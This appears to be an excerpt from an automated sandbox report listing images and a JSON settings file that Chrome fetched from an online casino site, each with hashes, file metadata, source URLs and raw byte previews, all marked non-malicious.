                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:lF+OhiCJ1iEqZNgyDu6t0MsKwGduOh4XxjQRcx8iagoOaI8Hq6bEhm1z+:v+uJslZNgR6tvs1S4X6Rcx8iaCaIsq6W
                                                                                                                                                          MD5:3FFA00B366D1E092F3A7CE8289BCBD82
                                                                                                                                                          SHA1:7AF30AF304E3ED541ADE1ABC1A434DC4CC5563F4
                                                                                                                                                          SHA-256:5617BCBCC41F114416D44B8211991DC43935010967B096165C3B93A1F1467C7D
                                                                                                                                                          SHA-512:8C9E71B68B5BF869C6D3F576FE5C0AD2B51D9444C81DC3297D84BB54A8450F72749B93519C329DE0AB0EF502EB949F33E17D619176529A7F4DB500AFD34159F4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/casino/01.png
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...w.%Wu...v.....sRV+.........l...H.....`...3`r4...6. .P.P.-..[.n.|O....G..."I..g.of.S.}.9u..^....z......~...o.O.d~.t....o&..'o=....*.u&.g\......?...O....z.w..7 Y...xF....Q...w.......d....... 3.S...gK8..F............3....%.........t....i..~-.,.OX.....E..0.......g%.W....?~..]..!.?..?...?.x..?..Oe......}x.8...&.n.3.)...#...}..........n....._...lN......<.7..dy',\.....%.p..`..$..1...c..s....R....x.S,.O.Xd..Br.k^}.RJ...om.r...)r..m..+._.wG....^....^s..i.."...!C....... .x...x.....O..,/&.y..8..].<......k...f2_.............Wqnw.X ."..D..}.....Eq..."..N.......U..+..(...3P........... ,f0.....q(..H....z....[...... '9.].y.B..>...a.%.......zY<...................D.#... ' Z...zaO./.E.%.<..!.(.ut8$P%w.....@..3..1...FA.r.%...k...K.......%.!.J... .<.Uo.^...7Pc......7..(...c . \...`..x.....k.n..qw.<.P....2/z.o....Z*.t.E...3.X[...G..qg~j..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1920x2080, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):791405
                                                                                                                                                          Entropy (8bit):7.972826850642288
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:6oKPGThMhWTLyT6Mvn6L6PvHkCqPYYGhXhXaaaQ+uB0smwEzRlMt0:2mMhyLIvHPvExODDoPdCG
                                                                                                                                                          MD5:374AF939A7241CD85A5D84A2C0EFEDD0
                                                                                                                                                          SHA1:A85E3D060EE7483C8AF7A17E28E928EA32742ADA
                                                                                                                                                          SHA-256:D7A7A07BB936E5E3CFA0B190996A91087294288292519D313B1CD670F6C1C354
                                                                                                                                                          SHA-512:DB40DE6C9D68E58156B981A502E7AB739B08CDAC77963E61F3C2191769A7993D8D51B72F27C40E5A268F532A132AA5BFBC985A2E501E2E6D542C60119465128A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:A24C38C8F39411E7995DD1277CDBF179" xmpMM:DocumentID="xmp.did:A24C38C9F39411E7995DD1277CDBF179"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A24C38C6F39411E7995DD1277CDBF179" stRef:documentID="xmp.did:A24C38C7F39411E7995DD1277CDBF179"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):28
                                                                                                                                                          Entropy (8bit):4.307354922057605
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:WZoS+Nhn:WZoSyh
                                                                                                                                                          MD5:A2432DC721D79CB02E73D270CE7E1EAA
                                                                                                                                                          SHA1:5A3C7BE77E9108ACA1B39E6BCD336EAAE6A51080
                                                                                                                                                          SHA-256:CE43C8C02C05A92B3E20FAB138AAD31B9FD54B92848913449D09924E839BB80E
                                                                                                                                                          SHA-512:0091B8D2F943169BDF1DD01D07A31F683F3B353D4EAADF1F7973AA79A989E349F53D6518AC612A856D89AB1539923C9FFAABB13E7CF8BEDF450E128342FF3298
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwm53Orwpb30gxIFDZFhlU4SBQ01hlQc?alt=proto
                                                                                                                                                          Preview:ChIKBw2RYZVOGgAKBw01hlQcGgA=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):31333
                                                                                                                                                          Entropy (8bit):7.990460330358006
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:1DWmiDD0F3/gnqzlLnfgEBN66g+jpP47lV:hcD06qdfJdgG47v
                                                                                                                                                          MD5:4146025B0447B8B592407D04119E7825
                                                                                                                                                          SHA1:7403C962B9B8A795A2150B302C54C2857E37D76E
                                                                                                                                                          SHA-256:29050BBB36C5FE4BE1AC861EF6604DC2344949718C0D8291E4AECAFA09E70230
                                                                                                                                                          SHA-512:C1E6C99ECFD40AADEC57969723B33200CA80E18E932187E8A808BE7B513AF465836BF42E6A6A678306179D90DF5DD15C7E827795A5D86EC684095949C29472CF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/card/04.png
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:D995B19D93A511EC97C2E3310858662A" xmpMM:InstanceID="xmp.iid:D995B19C93A511EC97C2E3310858662A" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3F730346459011EABC77EC84855C7F07" stRef:documentID="xmp.did:3F730347459011EABC77EC84855C7F07"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>)F....v.IDATx..}.|...7u{.V..D.H....\0.....'v.S.O...~yq....%N.w......*.P...J.w....A......{...hvv...}.{.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 191 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):46542
                                                                                                                                                          Entropy (8bit):7.990904213602547
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:gtcZzzF2leP662FYDDWawfDfy/o/kgZzNsADCQmd7CdUmmbB6SN3OFZ68L:gtCzzY2DDWac6/DQDDNdj2+JL
                                                                                                                                                          MD5:AB33D1BCC1F71565C98B2CFA843ADD37
                                                                                                                                                          SHA1:B87CE508B681EF6F0374B13BFA9E6F76EF72F331
                                                                                                                                                          SHA-256:350C0C31AC0829916F2EC32B030DD968B6439EE79589E1A03A71939244340066
                                                                                                                                                          SHA-512:07D89A2C10A0AD2C71E068D6CD8BE64F1FD6E6E3E37506D74639CE616A1E3B3F64A22FA05E39D8B296743D938ADCBEA1D9D2B5D2A25B49C61C424E5AEF0F8A2F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/245/games/mg/mg_game_02.png
                                                                                                                                                          Preview:.PNG........IHDR.......x.....,e.]....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:9A87830E7B7A11E8BDCD8E2655513498" xmpMM:DocumentID="xmp.did:9A87830F7B7A11E8BDCD8E2655513498"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9A87830C7B7A11E8BDCD8E2655513498" stRef:documentID="xmp.did:9A87830D7B7A11E8BDCD8E2655513498"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>u..y...>IDATx.|...l.U&.#..9..k...&DK.$d..^4.......W.....7..e{u.nC...4...Y !TR.T....w.9.OD..q..J`?]Iy.f.......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 300 x 283, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):42924
                                                                                                                                                          Entropy (8bit):7.984599902350812
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:PlxFmZ09Adpg5kx1DVps+gPV2Gzd88qLlU7k4ExIBeZRLdTFhdW:Plxd9JGDVpKUGzd8HK7Zg0sRLdTbs
                                                                                                                                                          MD5:89FD61C20C939B0621B8F52B0E0068F1
                                                                                                                                                          SHA1:FD2053ACC89C96463F0DCADF3E608DB5452F9545
                                                                                                                                                          SHA-256:B57D0DB6CA3EEA33EC8FE5ED24AC0AF97CC1B97FBF1DF16CB8FB80CD25B844A8
                                                                                                                                                          SHA-512:3F33EBEA5C5D462BBC5B0CAC507BB859E8C754347292A59362CD99CADB572051A977860364A0A9079A746DA7B0677ADB74C75FCBAAD32F36B21AE8BA68682A24
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/mobile/mobile.png
                                                                                                                                                          Preview:.PNG........IHDR...,.........W.IR....PLTE...k..U........e.......................hgq......TW\F@;........................spv..................nkq.......|{.xuz......*.....................................{....................w..3&..................gel...........A2(.......@................<Aj................GLx...............ys........g6...................t|....}......dk.Zb..v.|....lt.............l......w._8$.......>...kD1.^KWGAS+.A"....I............xd.!I.S(N<1\^f..........H.cTMOT..^H...sQ>..{/5Xi...n\......37....uZ.iSRS\RX..+c.....qlx.t}......t..(....r`X.L7...U...........*._g.C... +.-.jt..nf.5.....gDFP\d{..X............2{-0@.GM......{@<>|...5......*....o~........k..m...-J..Z..~I..........e2...m...I.r...x..E6.ILOr.+a..moq........?.._.w.{.?.lX!......tRNS.....%`F...e.......:M...GIDATx..?k.@...3NkO..n(.!/.c(\.....4xi9.B(.]JP.P..h...p.;h.o.A_!...=.k.m......LH..<......`8...;...p8x..a....b...g.wp.........;..{4....TE...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17878
                                                                                                                                                          Entropy (8bit):7.959716583208729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:OBLtpneFRErL/izHYU4KNT+GbKJrnl0YMMlTY3X4K6gwI:YtpnCErkN4K8GbKJrnl4Y/gL
                                                                                                                                                          MD5:3421B805EE092419843BD0B3CF2F3AD5
                                                                                                                                                          SHA1:FCDCA9406D3B0A7DE619225D006968F16F401528
                                                                                                                                                          SHA-256:2E72A4B6BB750E21045AA7BA60ABFBD2EA5FB721579ABD2F75875008FD815BD4
                                                                                                                                                          SHA-512:1A8AD295C8B019AE032F5CF1F3A188C189F8B128F6459174D3817147338E3AAD4BE739E869D796161D5F0390820D96916E16FEF371FD9F33C5282B92F67D5599
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/allbet_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D208D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D1F8D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2747
                                                                                                                                                          Entropy (8bit):5.375842791933336
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Yv1FLJxwewo9BH8/ZxD9Hk4026jz6PB8z76q5HdKgMfWYLgYc/o:GjDco7KJE40OaddrYhfc/o
                                                                                                                                                          MD5:684A47928EC95FD57ACC75A9C16F43EE
                                                                                                                                                          SHA1:57ACCCA0EB61707164460D05D2F18CEF6721DA11
                                                                                                                                                          SHA-256:801ED0B0C075EDC4B8A2B7F221EF89D85BCC729D6C55C21F8B24DC475E6848B6
                                                                                                                                                          SHA-512:1792B200C176987418F96BAF5F1EE6B74AA02C4712E1F8DEF81F8401C4E397BA89CE785482DD7A00F84645F44B9C24E985D690E2293051A4FCAFD3F766CC1ACA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/lt-cloud/stat.do?pv=ajax&pa=host.info&domain=t2391.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972891826904
                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"agentCode":"101323817914","snType":1,"iconRel":"/fileupload/ll12/202312/202312180056235.png","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{"videoProfitDayThreshold":300000,"agentBalanceControlFlat":0,"openUserFeeFlat":1,"openUserPointFlat":0,"lotteryProfitDayThreshold":"1000000","autoDrawAmount":500000,"openAutoDrawFlat":2,"regCaptchaType":"normal","captchaType":"normal","vipShowFlag":0,"smsLoginFlag":0,"thirdpartyTr
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1721
                                                                                                                                                          Entropy (8bit):7.852822511297969
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:w/6zON36zNzyjnh8ctimwek9OSkbsHn9Ap0dwLFJE:wSzYPrttkYe9A1LPE
                                                                                                                                                          MD5:9781464C7C55D9366512DCDD5088AAD2
                                                                                                                                                          SHA1:5D55F50A4132B78F18E0EBB894BCAB130F5B5798
                                                                                                                                                          SHA-256:88BDEEB60E51B3DD2D7505B845879430A1E7AC4A289C4B8B3223BFBBA2DEFBF3
                                                                                                                                                          SHA-512:C31F4E4F3C372A641E2C860880808C3BA4DBDF773F8A2B51F2BD3BCD798C04EA89EC2D9E5EACA2126F24BDC23BCD31DEFAE02260C2638337B6E936B20DB3ED37
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_mt.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs................kIDATH....o.W.......w....k.....Q..$.....R.............5.P%(}*T.....<T..+.R.hi...Ic..N.;....^......9<...B.*..<}~G....c.$..D..].S.sO.<..W....d.Pq..p}.L..a.*........Z.............l....k.4..V......?...4.g_K.0...<.P........*j...|.-.C.M..E,..9#...B.lz.K.....[..n`.,...pM...(....f`%U.\l..#?.......[....x..l..i h)..=}.. .FM.J..2.,=..O>...\:...U..q...m.t...$.+... .8....z%w...T.+A.....>t......khlk.3.`....nvi..v&lN?...@xn|...u-v..QYx.mG.&.;.;.(w..Q.........}.,..[..y..j.....0.f..zd.....iP@5$..........v..<.Z[PV..c.....3..=..*@M.....Q.F)8.... ...@x..k..k......[...}..T....*.G..!...V..x.9hR..&....tq...ZD'C.. ...m8....Z...P.@.....C..@..%>...wf...@.GP(.........v9.T......a.q.r......K..6+.A-........J._{...'.i....>....>.Y..?x...{#A..t.....%c;......./..../.....n..KV..L.Y..0.N...$X.v.V.9T.%,O,....7......r).L.../.C.W..O.,....G]....R...F.@{..ZSz..\.....F......kL.J..KvA0AD..q..{.P.!.d*....T...Dr.....CH..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 120x120, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=4, software=Adobe ImageReady], baseline, precision 8, 1160x48, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24478
                                                                                                                                                          Entropy (8bit):7.9351160710806505
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:57f35xXn30os1mjsh/RQglQnIC1QbZYxcafYe1d7a9KqzgutXoP1VzAnziUEV:5j35xXU1mj2+aC6bAcafY8d7aBXotV8a
                                                                                                                                                          MD5:D0B2ABE842A5C1B3526D2BDDF91E783E
                                                                                                                                                          SHA1:4A4B10D198F34505C83DA3F709C7669F4C9DC86C
                                                                                                                                                          SHA-256:F2F8D041C2CEB2923EE64F26AB81991B212F03FABA5D3017C2ECD48597E203C3
                                                                                                                                                          SHA-512:3CF04ADA1D925177963AB93533BD5D99898E95820E72022BD9E14E8844DE87FF76192C397D7C19D6016AA30DDF1B52AF5AC71AC502EDB20949EC15B5ED2B3DD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....x.x.....XExif..MM.*.......1.........>Q...........Q...........Q...............Adobe ImageReady.....C....................................................................C.......................................................................0...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...._.........5ht}5.[t..y.I.8EDVv8..A....5.....n`.w...~&.~$Zim....{.H.#...K<j...>..?..~#~.?.|;..h..k......<].....j!...]9..fU..pRH(...?..q....;]iu..n.^m-...8t..*;F....+..C.>$~.~..C...].&.......M;....R.. T2...v..K(l....s_1.C.[E....H.....x.5I..[.}C|.&.G ..j.bTg.v..~/.G...V^6.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, baseline, precision 8, 659x544, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):75656
                                                                                                                                                          Entropy (8bit):7.973251684846932
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:aFt/QuDmbbvL7nMJ2DFOH9+8MFYPy2cKLnruYN1hM173nJ/s+YXxnFSj/dzvQ:uQs2DswFI9hfcIiYK5nObXLSLFvQ
                                                                                                                                                          MD5:B8D7A960A4B6C034F047FF01DD4D9C43
                                                                                                                                                          SHA1:59196BB3341EA91A5A55270224A76FDC20E0EA54
                                                                                                                                                          SHA-256:9F8AFC863F5B3C95ACB8B8006DBF54857C58C904170D2F89B372F0F29887923F
                                                                                                                                                          SHA-512:6613A02E861D4EAE2B2FFDAA58E8AE493855A831CA43D33C57AA54178509A0E0E02B5B0F1032F10EB912BE450447D3295209DD805C69FB740E613EB759FD923B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.............................................................................................................................................S....Adobe.d........... ..............................................................................................!1.A.."Qa.q.2...#B..R..b...$3r...C...%cs.45T..........................!1..AQa.."q2.B..#R..34.............?..l.3.+M..~.oe.I.YO..I.......*."*<v.HvI..'...L..\....On.Hd...d..Oo.`l9(.>....,.....2%.%...$E.tV.....l.m....Z.Y#l...Sh.~PF..5v{I...4&k,..Sp..6.;W.dv.,.....q...A.F..l.6. k.......L.u..@.e.....0....C....b4t.l..;f..6........&.#....aK.4..#..W..q..X|.b.G!..wjp.'*.3d..nT^{...../&..FoJ...#s..(..Q......).bn.2TsbM..6......UI.....Tk..C..l.).......+TJ.*.4..:..%.6Q......U.lGlNx...0...j$...(M.4./#N.tBL6.s...~.....E.d.r...lY[..#..o...5....;.tr....^AW.r.%..S|..C.....dpqy..7lT....7.......S..Z=...v..............U..g%.J'..9..l..g.{E,TT.... .G....d}.....V.....\....X$|.....~.........I6.7...7.,mFR<'...>m./..{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17542
                                                                                                                                                          Entropy (8bit):2.7364272290679725
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:wSwYkEWmfUR0dBIg4SxNXrNGyMemGvsc5ZMvAfa1Cs333ey8:wSDk62bQ5MrvAf6jHc
                                                                                                                                                          MD5:889634BAB8FF956305D7E939039D773B
                                                                                                                                                          SHA1:0091018D1FBC899F3DEB50285FDFD56E76B22CBE
                                                                                                                                                          SHA-256:BE0D4E6A02FA401BC1BDA37C1121726C8FAC6DA6F99B52F79C7A409A6CB5C08E
                                                                                                                                                          SHA-512:DA5FA12405ACB4EF1F87412227D9CDBA782FCEA6BE866D7C74C40E9EBB0180614857C81B7BFC7E32F2F01EB2ECC6460A95DE95013B581090EE3167A9BA0222A7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs...............>%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpRights:Marked>False</xmpRights:Marked>. <xmpMM:OriginalDocumentID>uui
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):42069
                                                                                                                                                          Entropy (8bit):7.986105347433876
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:9YVo/cIBlCJ95oN6S9UeqREGjMNma9Y6X2mD+28n30NKzE51:2hInCJB1e0bLaKS2mDtY0b
                                                                                                                                                          MD5:83287A5B3C9D62C121456B24CEC097A4
                                                                                                                                                          SHA1:6D9A341A2EABAE09AEB1C42C802F3C5796E41F66
                                                                                                                                                          SHA-256:19EAFB0F452BE229559452D9A020B4D79BCD2FCE3549E913C9605DFDFD34533B
                                                                                                                                                          SHA-512:C87270117C83D5EF01D9547D3A57EF37A456E2721CA7C15E8D460BEDAAC166C8B0DE112734DE4C14D956F12B4D59614D4512A248B800A3F001014D53EDCC407A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
